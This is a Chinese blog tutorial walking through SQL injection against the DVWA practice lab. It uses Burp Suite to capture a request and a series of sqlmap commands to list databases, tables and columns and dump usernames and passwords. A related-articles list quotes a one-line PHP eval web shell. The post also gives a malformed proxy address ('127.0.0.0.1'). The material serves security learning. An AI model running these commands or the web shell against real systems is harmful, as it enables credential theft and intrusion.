使用burpsuite抓包 + sql工具注入 dvwa初级靶场

已于 2023-02-14 20:39:31 修改
阅读量2.6k 收藏 18
点赞数 1
分类专栏: web 文章标签: 网络 数据库 系统安全
于 2023-02-13 17:23:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afanzcf/article/details/129013098
版权
本文介绍了如何使用BurpSuite进行网络抓包,并配合火狐浏览器设置代理,以192.168.92.1/dvwa-master访问靶场。接着,通过BurpSuite保存注入点的包,并用SQLMap工具查询DVWA靶场的数据库名、数据表和数据列,最终读取用户和密码信息。过程中提到了解决浏览器显示问题和SQLMap更新问题的方法。
摘要由CSDN通过智能技术生成

使用burpsuite抓包 + sql工具注入 dvwa靶场

记录一下自己重新开始学习web安全之路②。

一、准备工作

1.工具准备 sqlmap + burpsuite

2.浏览器准备 火狐浏览器 + 设置代理。

首先,先设置一下火狐浏览器的代理

1

http代理地址为127.0.0.0.1 ,端口为8080

3.burpsuite 准备 将burpsuite的抓包功能打开。

注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问

怎么查到本地网卡ip?

在cmd中输入ipconfig

2

得到本地网卡ip 192.168.92.1

如果是无线网,那么找无线网适配器的IPV4地址

3

通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。

4

在搜索框输入之后,点击submit。

通过burpsuite抓包得到

5

注:抓到的包必须是注入点的包

如:
(GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等

然后在burpsuite中 点击Action — Save item 保存到本地。

保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。

目标:拿账号密码(数据)

1.查询数据库的名称 (dvwa)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db

6

7

-r // 指定读取本地文件

–current-db //列出当前网站数据库名称

2.查询数据表的名称 (guestbook 、users)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables

8

9

-D //指定数据库名称

–tables //数据表

3.查询数据列的名称 (user 、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns

10

11

-T //指定数据表的名称

–columns //列出数据列的名称

4.读取数据 (user、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump

12

13

-C //指定数据列的名称

–dump // 读取数据

拿账号密码时遇到的问题:

1.首先是burpsuite抓包时 火狐浏览器显示

14

通过百度得到解决办法:

15

2.sqlmap,更新问题,可以不用管,但是一开始看到有警告,去官网下了一个新的sqlmap即可。

Afanbird
关注
专栏目录
DVWA--SQL注入
xiaoxiao的博客
01-07 3484
SQL注入原理 就是通过sql命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SDL命令。具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在WEB表单中输入恶意SQL语句得到包含漏洞的网站数据库,而不是按照设计者意图去执行。 SQL注入类型 按照数据提交的方式: GET注入、POST注入、COOKIE注入、HTTP头部...
DVWA靶场】Web安全之(布尔值/延时型)SQL盲注(超详细教程)
weixin_60838266的博客
07-25 1436
SQL注入是一种常见的网络安全漏洞,通过利用网站对用户输入数据的不完善检查和过滤,攻击者可以向数据库服务器发送恶意的SQL查询,从而获取敏感信息或者对数据库进行破坏。在本文中,通过Kali Linux对DVWASQL Injection模块展开了实验,并使用手工和burpsuite工具针对Low、Medium和High等级进行了布尔值/延时型的SQL盲注测试
Burp Suite重放攻击DVWA靶场【实验】
weixin_63600334的博客
06-17 1484
实验中用到了burpsuite工具对搭建的练习靶场dvwa中的BruteForce关卡进行练习,利用到burpsuite中的proxy代理代理、intruder入侵模块和Repeater重放模块。
BurpSuiteSQL注入 | SQL injection(1-2)
最新发布
m0_71944965的博客
09-27 698
查询发现其为url传参 在url处用单引号闭合,发现报错 加上注释后页面恢复,且出现未发布产品 让查询的值等于所有再加上注释,即可查到所有商品(包括未发布的商品) 在登陆处用户名加单引号闭合,发现报错 加上注释页面恢复正常 将Username改为 实现单引号闭合,且注释掉后面的错误密码 `
开源利器之MySQL抓包工具:MySQL Sniffer
weixin_37098404的博客
03-02 324
这是一个什么样的开源项目? MySQL Sniffer 是一个基于 MySQL 协议的抓包工具,实时抓取 MySQLServer 端的请求,并格式化输出。输出内容包访...
mysql抓包_MySQL抓包工具:MySQL Sniffer【转】
weixin_30155853的博客
01-19 266
简介MySQL Sniffer 是一个基于 MySQL 协议的抓包工具,实时抓取 MySQLServer 端的请求,并格式化输出。输出内容包访问括时间、访问用户、来源 IP、访问 Database、命令耗时、返回数据行数、执行语句等。有批量抓取多个端口,后台运行,日志分割等多种使用方式,操作便捷,输出友好。同时也适用抓取 Atlas 端的请求,Atlas 是奇虎开源的一款基于MySQL协议的数据中...
MySQL抓包工具:MySQL Sniffer【转】
weixin_34405557的博客
03-03 222
本文来自:https://github.com/Qihoo360/mysql-sniffer 简介       MySQL Sniffer 是一个基于 MySQL 协议的抓包工具,实时抓取 MySQLServer 端的请求,并格式化输出。输出内容包访问括时间、访问用户、来源 IP、访问 Database、命令耗时、返回数据行数、执行语句等。有批量抓取多个端口,后台运行,日志分割等多种使用方式,...
burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
热门推荐
12-27 1万+
【BP靶场-服务端-SQL注入】16个实验-万文详细步骤
DvwaSQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1073
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
用Burp对DVWA重放爆破攻击文章的配套资源
05-26
在IT安全领域,尤其是Web应用安全测试中,Burp Suite是一款强大的工具,它被广泛用于进行漏洞检测和攻击模拟。本篇文章的配套资源是针对DVWA(Damn Vulnerable Web Application)进行重放爆破攻击的一个实践教程。...
sqlmap在windows上执行sql注入,利用dvwa靶场
m0_46315342的博客
05-19 979
sqlmap在windows上执行sql注入,利用dvwa靶场 1.首先你要安装好sqlmap并且配置好坏境,不知道的百度搜索吧,还是比较简单的。 2.先安利一个博主手工注入的博客吧,建议学的时候先手工注入明白原理,体验一下痛楚,哈哈哈哈。 https://blog.csdn.net/qq_36119192/category_8345945.html 3.接下来我分享一下我的sqlmap注入过程 ··1网上很多都是在kali linux上执行的,但是别人建议新手小白先不要用这个,所以我就在windows上执
非常好用的SQL Server 抓取SQL语句工具HOOK
03-23
非常好用的SQL Server 抓取SQL语句工具HOOK 非常好用的SQL Server 抓取SQL语句工具HOOK 非常好用的SQL Server 抓取SQL语句工具HOOK 非常好用的SQL Server 抓取SQL语句工具HOOK
DVWASQL手工注入
编程界菜姬的博客
06-02 1341
1.注入思路1.判断是否存在注入注入的类型是字符型、数字型还是搜索型2.猜解 SQL 查询语句中的字段数3.确定显示的字段顺序4.获取当前数据库5.获取数据库中的表6.获取表中的字段名7.查询 ...
Burpsuite + DVWA 入门实战
LYSM
04-10 1万+
Burpsuite 版本:2.0 浏览器:火狐 不再介绍怎么安装和激活 。 1.firefox代理设置 2.firefox的证书设置 url栏输入 http://burp,点击 CA Certificate 下载证书(放桌面就行) 导入证书 3.burpsuite的设置 然后就可以抓包了 注意抓包的时候浏览器打不开网页属于正常现象,如果需要继续浏览,点击“intercept is on”按钮即可...
mysql连接池360_360 MySQL 协议的抓包工具
weixin_39535125的博客
01-20 128
MySQL Sniffer 是一个基于 MySQL 协议的抓包工具,实时抓取 MySQLServer 端或 Client 端请求,并格式化输出。输出内容包括访问时间、访问用户、来源 IP、访问 Database、命令耗时、返回数据行数、执行语句等。有批量抓取多个端口,后台运行,日志分割等多种使用方式,操作便捷,输出友好。特别注意,请先安装依赖: glib2-devel(2.28.8)、libpca...
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1320
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行中用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
DVWA系列(二)——使用BurpSuite进行Command injection(命令行注入
weixin_45116657的博客
08-21 963
Command Injection(命令行注入)简介: 1、命令执行概念: 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。也就好比一句话<?php @eval($_POST[cmd]);?> ...
burpsuitesqlmap联动(sqlipy配置)
Welcome To Myon'Blog !
12-21 1530
下载好之后将这个jar文件放到某个位置(我是直接拉到了burpsuite位置),然后导入该路径。解压sqlmap的压缩包后里面有一个sqlmapapi.py的文件。第二个路径为你自己Python环境的路径,需要写到lib文件夹。关于配置burpsuitesqlmap联动的介绍至此结束。找到 sqlipy sqlmap integration。下载好后解压,里面还有一个sqlmap的压缩包,一并解压。在burpsuitesqlipy框进行配置。安装成功后会多出一个sqlipy的框。
DVWA系列(二)——使用Burpsuite进行Command Injection(命令行注入
橘子女侠
04-29 3152
1. Command Injection简介 (1)命令执行概念 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;就好比说一句话木马<?php @eval($_POST['cmd']);?> (2)分类 代码过滤不严或无过滤; 系统漏洞造成的命令执行,bash破壳漏洞,该漏洞可以构...
如何使用burpsuite抓包
07-27
默认情况下,Burp Suite使用的代理地址是`localhost`,端口是`8080`。您可以在Burp Suite中的`Proxy`选项卡下找到这些设置。 3. 启动Burp Suite和浏览器:启动Burp Suite,并确保已经成功配置了代理设置。然后,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值